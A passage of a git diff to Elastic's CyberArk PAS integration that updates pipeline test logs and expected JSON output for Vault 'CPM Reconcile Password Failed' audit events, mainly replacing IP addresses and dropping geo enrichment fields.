address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json index 0eaba86f2f2..9fa0357de03 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log-expected.json @@ -7,19 +7,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -39,7 +28,7 @@ }, "@timestamp": "2021-03-11T21:12:22.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -51,27 +40,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-11T21:12:22Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615497142\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615497142\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -82,9 +71,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615497142", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -98,8 +87,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176769500Z", - "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403065Z", + "original": "\u003c7\u003e1 2021-03-11T21:12:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:12:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:12:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615497142\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 